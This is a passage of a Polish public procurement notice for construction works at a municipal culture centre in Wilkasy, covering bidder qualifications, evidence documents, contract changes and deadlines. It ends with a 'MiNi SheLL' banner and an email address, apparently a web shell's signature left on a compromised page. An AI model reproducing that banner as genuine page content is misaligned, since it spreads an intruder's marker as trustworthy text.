udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w<br/>Rozdziale VI SWZ oraz spełniają warunki udziału w postępowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym; Zamawiający nie określa warunków w tym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile to wynika to z odrębnych<br/>przepisów; Zamawiający nie określa warunków w tym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej; Zamawiający nie określa warunków w tym zakresie.<br/>4) zdolności technicznej lub zawodowej;<br/>O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy:<br/>• dotyczy zadania 1<br/>a) posiadają doświadczenie zawodowe niezbędne do wykonania przedmiotu zamówienia, tj. w okresie ostatnich 5 lat przed<br/>terminem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie i złożą wykaz (zgodnie z<br/>załącznikiem nr 4 do SWZ) - z wykonaną z co najmniej jedną robotą budowlaną polegającą na budowie, przebudowie,<br/>modernizacji i remoncie obiektów kubaturowych o wartości nie mniejszej niż: 200 000,00 zł brutto;<br/>Uwaga! Zamawiający wymaga potwierdzenia warunku zdolności technicznej lub zawodowej dla każdego z zadań osobno,<br/>(czyli składając ofertę na trzy zadania należy wykazać dwie roboty o wskazanych dla danego z zadania min. wartości brutto<br/>wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których te roboty zostały<br/>wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym<br/>dowodami, o których mowa są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty<br/>budowlane zostały wykonane, a jeżeli Wykonawca<br/>z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy.<br/>Uwaga! Oświadczenie, o którym mowa powyżej powinno zawierać opis obiektywnych (rzeczywistych, realnych) okoliczności<br/>uniemożliwiających uzyskanie referencji od podmiotu na rzecz, którego wykonano roboty budowlane.<br/>Uwagi:<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek określony w ust. 1 pkt 4 ppkt a)<br/>zostanie spełniony, jeżeli jeden z Wykonawców spełni warunek samodzielnie.<br/>Zamawiający nie dopuszcza sumowania robót budowlanych wykonanych w ramach odrębnych kontraktów<br/>(umów/zamówień) celem uzyskania wymaganego warunku kwotowego.<br/>W przypadku, gdy złożone przez Wykonawców dokumenty, dotyczące warunków udziału<br/>w postępowaniu zawierają dane/informacje w innych walutach niż określono to w niniejszej SWZ (dotyczy wykazu<br/>zrealizowanych usług), Zamawiający, jako kurs przeliczeniowy waluty przyjmie kurs NBP z dnia opublikowania ogłoszenia o<br/>zamówieniu, jeżeli w tym dniu nie będzie publikowany średni kurs NBP, zostanie przyjęty kurs średni z ostatniej tabeli przed<br/>dniem opublikowania ogłoszenia o zamówieniu. Kursy walut dostępne są pod następującym adresem internetowym:<br/>http://www.nbp.pl/home.aspx?f=/Kursy/kursy.htm<br/>Zamawiający będzie korzystał z „Archiwum kursów średnich tabela ,,A”<br/>http://www.nbp.pl/home.aspx?c=/ascx/archa.ascx<br/>W przypadku, gdy usługi zostały wykonane na rzecz Zamawiającego tj. Gminny Ośrodek Kultury i Rekreacji w Wilkasach<br/>należy je ująć w wykazie (załącznik nr 4 do SWZ) i wskazać dokumenty, które znajdują się w posiadaniu Zamawiającego<br/>oraz potwierdzić ich prawidłowość i aktualność. Wykonawca nie jest zobowiązany do złożenia podmiotowych środków<br/>dowodowych, które Zamawiający posiada, jeżeli Wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i<br/>aktualność.<br/>b) posiadają niezbędny potencjał kadrowy, w tym zakresie Zamawiający wymaga, aby wykonawca dysponował minimum<br/>jedną osobą na każde z niżej wymienionych stanowisk i złożą wykaz osób skierowanych do realizacji zadania 1 zgodnie<br/>z załącznikiem nr 5 do SWZ:<br/>kierownik budowy (pełniący jednocześnie rolę kierownika robót) – minimalne wymagania:<br/>• posiadający uprawnienia do kierowania robotami budowlanymi w zakresie zgodnym<br/>z przedmiotem zamówienia w specjalności konstrukcyjno-budowlanej,<br/>• osobą posiadającą co najmniej 5 letnie doświadczenie zawodowe, prawo do pełnienia samodzielnych funkcji technicznych<br/>w budownictwie bez ograniczeń lub odpowiadające im równoważne uprawnienia w tej specjalności, które zostały wydane na<br/>podstawie wcześniej obowiązujących przepisów, zgodnie z wymogami ustawy Prawo budowlane oraz ważne zaświadczenie<br/>o przynależności do właściwej izby samorządu zawodowego; <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Oświadczenie wymagane<br/>od wszystkich Wykonawców, które należy złożyć wraz<br/>z ofertą:<br/>1.1. Oświadczenie Wykonawcy o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu lub kryteriów selekcji, w<br/>zakresie wskazanym przez Zamawiającego stanowiące Załącznik nr 2 do SWZ;<br/>1.2. W przypadku wspólnego ubiegania się o zamówienie przez 1. Zgodnie z art. 273 ust. 1 w postępowaniu o udzielenie<br/>zamówienia Zamawiający może żądać podmiotowych środków dowodowych na potwierdzenie:<br/>1) braku podstaw wykluczenia;<br/>2) spełniania warunków udziału w postępowaniu (o ile są określone),<br/>w formie określonej w Rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020r. w sprawie podmiotowych<br/>środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać Zamawiający od Wykonawcy (Dz. U. z 2020r.<br/>poz. 2415).<br/>2. W przedmiotowym postępowaniu Zamawiający żąda podmiotowych środków dowodowych na potwierdzenia spełniania<br/>postawionego warunku posiadania zdolności technicznej lub zawodowej.<br/>3. Zamawiający przed wyborem oferty najkorzystniejszej wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia<br/>w wyznaczonym terminie, nie krótszym niż 5 dni:<br/>DOTYCZY ZADANIA 1:<br/>• wykaz (zgodnie z załącznikiem nr 4 do SWZ) - z wykonaną z co najmniej jedną robotą budowlaną polegającą na budowie,<br/>przebudowie, modernizacji obiektów kubaturowych o wartości nie mniejszej niż: 200 000,00 zł brutto;<br/>• wykaz osób skierowanych do realizacji zadania 1 zgodnie z załącznikiem nr 5 do SWZ:<br/>kierownik budowy (pełniący jednocześnie rolę kierownika robót) – minimalne wymagania:<br/>􀀀 posiadający uprawnienia do kierowania robotami budowlanymi w zakresie zgodnym z przedmiotem zamówienia w specjalności<br/>konstrukcyjno-budowlanej,<br/>􀀀 osobą posiadającą co najmniej 5 letnie doświadczenie zawodowe, prawo do pełnienia samodzielnych funkcji technicznych w<br/>budownictwie bez ograniczeń lub odpowiadające im równoważne uprawnienia w tej specjalności, które zostały wydane na podstawie<br/>wcześniej obowiązujących przepisów, zgodnie<br/>z wymogami ustawy Prawo budowlane oraz ważne zaświadczenie<br/>o przynależności do właściwej izby samorządu zawodowego;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Oświadczenie wymagane od wszystkich Wykonawców, które należy złożyć wraz<br/>z ofertą:<br/>1.1. Oświadczenie Wykonawcy o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu lub kryteriów selekcji, w<br/>zakresie wskazanym przez Zamawiającego stanowiące Załącznik nr 2 do SWZ;<br/>1.2. W przypadku wspólnego ubiegania się o zamówienie przez 1. Zgodnie z art. 273 ust. 1 w postępowaniu o udzielenie<br/>zamówienia Zamawiający może żądać podmiotowych środków dowodowych na potwierdzenie:<br/>1) braku podstaw wykluczenia;<br/>2) spełniania warunków udziału w postępowaniu (o ile są określone),<br/>w formie określonej w Rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020r. w sprawie podmiotowych<br/>środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać Zamawiający od Wykonawcy (Dz. U. z 2020r.<br/>poz. 2415).<br/>2. W przedmiotowym postępowaniu Zamawiający żąda podmiotowych środków dowodowych na potwierdzenia spełniania<br/>postawionego warunku posiadania zdolności technicznej lub zawodowej.<br/>3. Zamawiający przed wyborem oferty najkorzystniejszej wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia<br/>w wyznaczonym terminie, nie krótszym niż 5 dni:<br/>DOTYCZY ZADANIA 1:<br/>• wykaz (zgodnie z załącznikiem nr 4 do SWZ) - z wykonaną z co najmniej jedną robotą budowlaną polegającą na budowie,<br/>przebudowie, modernizacji obiektów kubaturowych o wartości nie mniejszej niż: 200 000,00 zł brutto;<br/>• wykaz osób skierowanych do realizacji zadania 1 zgodnie z załącznikiem nr 5 do SWZ:<br/>kierownik budowy (pełniący jednocześnie rolę kierownika robót) – minimalne wymagania:<br/>􀀀 posiadający uprawnienia do kierowania robotami budowlanymi w zakresie zgodnym z przedmiotem zamówienia w specjalności<br/>konstrukcyjno-budowlanej,<br/>􀀀 osobą posiadającą co najmniej 5 letnie doświadczenie zawodowe, prawo do pełnienia samodzielnych funkcji technicznych w<br/>budownictwie bez ograniczeń lub odpowiadające im równoważne uprawnienia w tej specjalności, które zostały wydane na podstawie<br/>wcześniej obowiązujących przepisów, zgodnie<br/>z wymogami ustawy Prawo budowlane oraz ważne zaświadczenie<br/>o przynależności do właściwej izby samorządu zawodowego;</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 28. Na ofertę składa się:<br/>28.1. Formularz ofertowy – wg. załącznika nr 1 do SWZ;<br/>wraz z ofertą należy złożyć:<br/>28.2. Oświadczenie Wykonawcy o spełnianiu warunków i niepodleganiu wykluczeniu zgodnie z Załącznikiem nr 2 do SWZ;<br/>28.3. Informacja z Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej – w celu<br/>potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowania do jego reprezentowania: (Wykonawca nie jest<br/>zobowiązany do złożenia tego dokumentu, o ile wskaże dane umożliwiające dostęp do tych dokumentów w Formularzu<br/>Ofertowym w Części III punkt 1)<br/>28.4. Pełnomocnictwo – w przypadku podpisania oferty przez osobę, której umocowanie nie wynika z dokumentów<br/>rejestrowych, w oryginale w takiej samej formie, jak składana oferta (t. j. w formie elektronicznej). Dopuszcza się także<br/>złożenie elektronicznej kopii (skanu) pełnomocnictwa sporządzonego uprzednio w formie pisemnej, w formie<br/>elektronicznego poświadczenia za zgodność z okazanym dokumentem opatrzonego kwalifikowanym podpisem<br/>elektronicznym przez notariusza stosownie do art. 97§2 Prawa o notariacie ustawy z dnia 14 lutego 1991r., bądź też<br/>poprzez opatrzenie skanu pełnomocnictwa sporządzonego uprzednio w formie pisemnej kwalifikowanym podpisem,<br/>podpisem zaufanym lub podpisem osobistym mocodawcy. Elektroniczna kopia pełnomocnictwa nie może być<br/>uwierzytelniona przez upełnomocnionego.<br/>28.5. W przypadku oferty składanej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (np.<br/>konsorcjum), do oferty powinno być załączone pełnomocnictwo dla osoby uprawnionej do ich reprezentowania w<br/>postępowaniu.<br/>28.6. W przypadku zastrzeżenia informacji jako „tajemnica przedsiębiorstwa” - oświadczenia i/lub dokumenty na podstawie<br/>których, Zamawiający dokona oceny skuteczności zastrzeżenia informacji zawartych w ofercie, stanowiących tajemnicę<br/>przedsiębiorstwa, w rozumieniu przepisów<br/>o zwalczaniu nieuczciwej konkurencji. (jeżeli Wykonawca zastrzega takie informacje).<br/>28.7. zobowiązanie podmiotu udostępniającego zasoby zgodnie<br/>z załącznikiem nr 3 do SWZ (jeżeli dotyczy) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Znajduje się w Rozdziale IX-SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający dopuszcza zmiany umowy w zakresie:<br/>1) zmiany terminu wykonania umowy – gdy z powodu działania siły wyższej nie jest możliwe wykonanie przedmiotu umowy<br/>w umówionym terminie, bądź gdy niewykonanie umowy w terminie wyniknie z przyczyn leżących po stronie Zamawiającego,<br/>wstrzymanie robót przez uprawnione organy lub inny podmiot,<br/>z przyczyn nie wynikających z winy Wykonawcy.<br/>2) przedłużenia terminu wykonania umowy, o okres nie dłuższy niż okres trwania postępowania odwoławczego przed<br/>Krajową Izbą Odwoławczą oraz sądem powszechnym, w przypadku, gdy zostało wniesione odwołanie w postępowaniu<br/>o udzielenie zamówienia publicznego;<br/>3) innych istotnych postanowień umowy - gdy ich zmiana jest konieczna w związku ze zmianą przepisów prawa<br/>powszechnie obowiązującego;<br/>4) zmiany wynagrodzenia umownego - w przypadku robót dodatkowych lub zamiennych identycznych lub analogicznych do<br/>robót ujętych w kosztorysie ofertowym Wykonawca zobowiązany jest wykonać na poziomie cen kosztorysu ofertowego.<br/>Wycena ewentualnych robót dodatkowych, lub zamiennych, niewystępujących<br/>w kosztorysie ofertowym, dla których nie można będzie ustalić wartości w oparciu o ceny jednostkowe kosztorysu<br/>ofertowego, zostanie wykonana w formie kosztorysu ofertowego sporządzonego metodą szczegółową, przy zastosowaniu<br/>Ogłoszenie nr 2025/BZP 00167739/01 z dnia 2025-03-28<br/>2025-03-28 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Roboty budowlane<br/>następujących nośników cenotwórczych ujętych w kosztorysie ofertowym.<br/>2. W przypadku zmiany cen materiałów lub kosztów, związanych z realizacją przedmiotu umowy, o których mowa w art.439<br/>Pzp, maksymalne wynagrodzenie netto i brutto Wykonawcy o którym mowa w § 5 umowy, (dalej wynagrodzenie),<br/>3. Strony ustalają zasady wprowadzania zmian, o których mowa w ust. 3 umowy Strony<br/>po dniu ogłoszenia wskaźnika GUS, o którym mowa w ust. 3 lit. a mogą wystąpić z pisemnym żądaniem zmiany<br/>wynagrodzenia, z zastrzeżeniem postanowień lit. b , przedstawiając kalkulację żądanej zmiany. Wniosek o zmianę<br/>wynagrodzenia powinien zawierać opis stanu faktycznego w zakresie aktualnych na dzień jego złożenia kosztów<br/>ponoszonych przez Wykonawcę w tej części wynagrodzenia, którego dotyczy zmiana (tj. w zakresie ceny materiałów oraz<br/>kosztów innych składników związanych z realizacją zamówienia, z wyłączeniem kosztów wskazanych w lit. a w odniesieniu<br/>do kosztu z okresu poprzedzającego wniosek o waloryzację i przywołanie podstawy uzasadniającej wnioskowanie zmiany.<br/>Wykonawca we wniosku o zmianę wynagrodzenia zobowiązany jest wykazać jaki procent wynagrodzenia umownego brutto<br/>za kwartał poprzedzający kwartał, w którym złożył wniosek o waloryzację stanowiły koszty materiałów i usług,<br/>o których mowa w art. 439 Pzp. Wykonawca w celu wykazania wpływu zmiany ceny<br/>na koszt realizacji usługi może przedstawić Zamawiającemu dokumenty zakupu tych materiałów, które są najczęściej<br/>zużywane przy realizacji usługi/dostawy/roboty budowlanej objętej umową, potwierdzające wzrost kosztu materiałów w<br/>stosunku<br/>do okresu poprzedzających wniosek o waloryzację.<br/>4. Zamawiający dokona zmiany wysokości zobowiązania wynikającego z oferty Wykonawcy w przypadku wystąpienia jednej<br/>z następujących okoliczności:<br/>1) zmiany stawki podatku od towarów i usług,<br/>2) zmiany wysokości minimalnego wynagrodzenia ustalonego na podstawie przepisów o minimalnym wynagrodzeniu za<br/>pracę,<br/>3) zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na<br/>ubezpieczenia społeczne lub zdrowotne,<br/>4) zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych,<br/>o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych<br/>- jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-05-26 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/gokir_wilkasy</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-05-26 10:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-06-24</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> 1. Zamawiający korzysta z uprawnienia, o jakim stanowi art. 288 ust. 1 ustawy Pzp i zastrzega sobie prawo do zaproszenia<br/>do negocjacji maksymalnie trzech Wykonawców, których oferty przedstawiają najkorzystniejszy stosunek jakości do ceny,<br/>obliczony na podstawie kryteriów oceny ofert, określonych w rozdziale XVIII.<br/>Ogłoszenie nr 2025/BZP 00167739/01 z dnia 2025-03-28<br/>2025-

Creat By MiNi SheLL
Email: jattceo@gmail.com